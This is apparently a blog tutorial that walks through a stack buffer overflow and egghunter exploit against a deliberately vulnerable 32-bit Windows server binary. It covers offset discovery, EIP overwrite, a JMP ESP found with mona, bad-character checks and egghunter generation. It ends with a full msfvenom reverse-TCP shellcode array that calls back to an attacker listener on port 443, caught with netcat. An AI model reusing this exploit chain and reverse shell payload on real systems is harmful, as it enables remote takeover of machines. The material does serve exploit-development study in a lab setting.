Egg hunting in 32-bit Windows binary exploitation is a technique used to locate and exploit vulnerabilities in software running on 32-bit versions of the Windows operating system. we are going into exploit a vulnerable binary and gain a reverse shell/command execution by overflowing the stack and chaining addresses to execute our shellcode.
Egg hunting typically involves the following steps, which are provided for educational purposes only:
- Identification of Vulnerability: The first step in egg hunting is identifying a vulnerability within the target software. This could be a buffer overflow, a format string vulnerability, or another type of programming error that can be exploited.
- Crash Replication: Once a vulnerability is identified, the attacker aims to replicate the crash or trigger the vulnerability to gain control over the program's execution flow.
- Egg Construction: In egg hunting, the attacker constructs a small shellcode payload referred to as the "egg." The purpose of the egg is to locate and execute a larger malicious payload, typically referred to as the "shellcode."
- Egg Hunting Routine: The egg hunting routine is designed to search the program's memory space for a specific marker that identifies the presence of the egg. The marker is a unique pattern or string chosen by the attacker.
- Execution of Shellcode: Once the egg hunting routine successfully locates the egg, it transfers control to the shellcode payload. The shellcode is designed to execute the attacker's desired actions, such as gaining remote access or taking control of the compromised system.
You can download the Vuln Server code/binary from Github here
# Fuzzing to Identity the offset
The program broke at 100. so, we are going to generate 100 bytes pattern using pattern_create.rb msf module.┌──(kali㉿kali)-[/]
└─$ pattern_create.rb -l 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
# Finding the offset
─(kali㉿kali)-[/]
└─$ pattern_offset.rb -q 63413363
[*] Exact match at offset 70
# EIP Control
Now that we know the pattern is 70, lets try to send "A"*70 + "B"*4 to check if we can overwrite EIP with our BBBB - \x42\x42\x42\x42
You can see that, we are able to overwrite the buffer successfully
# Finding JMP ESP Address
- Run the 3rd script, EIP Control again and when the crash happens, we will look for JMP ESP Address using mona
- Pick one address from the list of addresses presented by mona as our JUMP Address
- Check if the JMP Address is working properly or not
- Set a breakpoint on the JMP ESP address for analyzing the buffer and finding a new JMP Adderess to save shellcode
- Restart the program --> right click --> go to --> 625011AF
- hit "F2" to set a breakpoint
- Send the payload and when it reaching the breakpoint --> STEP into it
- Scroll back to the start of A's and give it as a Jump Address -
- in this example - we have 70 A's before our JMP Address - so, find out the instruction for finding JMP -70 bytes + /x90/x90
-you can do it using msf-nasm-shell
└─$ msf-nasm_shell nasm > jmp $-70 00000000 EBB8 jmp short 0xffffffba nasm >
Update the code with next jump address
# Bad Characters Check
You can generate all byte characters using Mona from immunity debugger using `!mona bytearray`
- this will create a file in the installation directory of immunity debugger
- we are going to send 70 bytes at once as we have limited space
- it is recommended to remove \x00 from the byte chars - as its sure to break the flow of the program
Set a breakpoint at first jump and step into it and scroll up a bit and look for the bytes that you sent
# EGG Hunting
\x00 is the only bad char we found from validating all the 256 chars.
- Create a pattern of 1000 bytes using pattern create for SHELLCODE space.
- Create the pattern using `pattern_create.rb -l 1000`
- Set a breakpoint at JMP ESP and search for the msf pattern using mona
- `!mona findmsp`
"CTRL+G" go to that location --> 0x003e4afd --> right click --> Follow in Dump. this does look like msf pattern
generate the egg hunter code using `!mona egg -t EGGS` ; you can use any keyword which is of 4 chars
- make sure there is no null byte in shellcode generated by mona
-Set a breakpoint at JMP ESP and send the payload again
- look into the egghunter shellcode which is looking for the target double eggs keyword to find our shellcode address starting point "EGGSEGGS"
# FINAL EXPLOIT
- Generate shellcode using msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.10.162 LPORT=443 -f c -b '\x00' "\xd9\xf6\xbe\x42\x2a\xeb\xbd\xd9\x74\x24\xf4\x5d\x2b\xc9" "\xb1\x52\x31\x75\x17\x03\x75\x17\x83\xaf\xd6\x09\x48\xd3" "\xcf\x4c\xb3\x2b\x10\x31\x3d\xce\x21\x71\x59\x9b\x12\x41" "\x29\xc9\x9e\x2a\x7f\xf9\x15\x5e\xa8\x0e\x9d\xd5\x8e\x21" "\x1e\x45\xf2\x20\x9c\x94\x27\x82\x9d\x56\x3a\xc3\xda\x8b" "\xb7\x91\xb3\xc0\x6a\x05\xb7\x9d\xb6\xae\x8b\x30\xbf\x53" "\x5b\x32\xee\xc2\xd7\x6d\x30\xe5\x34\x06\x79\xfd\x59\x23" "\x33\x76\xa9\xdf\xc2\x5e\xe3\x20\x68\x9f\xcb\xd2\x70\xd8" "\xec\x0c\x07\x10\x0f\xb0\x10\xe7\x6d\x6e\x94\xf3\xd6\xe5" "\x0e\xdf\xe7\x2a\xc8\x94\xe4\x87\x9e\xf2\xe8\x16\x72\x89" "\x15\x92\x75\x5d\x9c\xe0\x51\x79\xc4\xb3\xf8\xd8\xa0\x12" "\x04\x3a\x0b\xca\xa0\x31\xa6\x1f\xd9\x18\xaf\xec\xd0\xa2" "\x2f\x7b\x62\xd1\x1d\x24\xd8\x7d\x2e\xad\xc6\x7a\x51\x84" "\xbf\x14\xac\x27\xc0\x3d\x6b\x73\x90\x55\x5a\xfc\x7b\xa5" "\x63\x29\x2b\xf5\xcb\x82\x8c\xa5\xab\x72\x65\xaf\x23\xac" "\x95\xd0\xe9\xc5\x3c\x2b\x7a\x2a\x68\x39\xd8\xc2\x6b\x3d" "\x1d\xa8\xe5\xdb\x77\xde\xa3\x74\xe0\x47\xee\x0e\x91\x88" "\x24\x6b\x91\x03\xcb\x8c\x5c\xe4\xa6\x9e\x09\x04\xfd\xfc" "\x9c\x1b\x2b\x68\x42\x89\xb0\x68\x0d\xb2\x6e\x3f\x5a\x04" "\x67\xd5\x76\x3f\xd1\xcb\x8a\xd9\x1a\x4f\x51\x1a\xa4\x4e" "\x14\x26\x82\x40\xe0\xa7\x8e\x34\xbc\xf1\x58\xe2\x7a\xa8" "\x2a\x5c\xd5\x07\xe5\x08\xa0\x6b\x36\x4e\xad\xa1\xc0\xae" "\x1c\x1c\x95\xd1\x91\xc8\x11\xaa\xcf\x68\xdd\x61\x54\x98" "\x94\x2b\xfd\x31\x71\xbe\xbf\x5f\x82\x15\x83\x59\x01\x9f" "\x7c\x9e\x19\xea\x79\xda\x9d\x07\xf0\x73\x48\x27\xa7\x74" "\x59";
- Update the shellcode in the final exploit and run it, you should get reverse shell on your netcat session `nc -nvlp 443`
No comments:
Post a Comment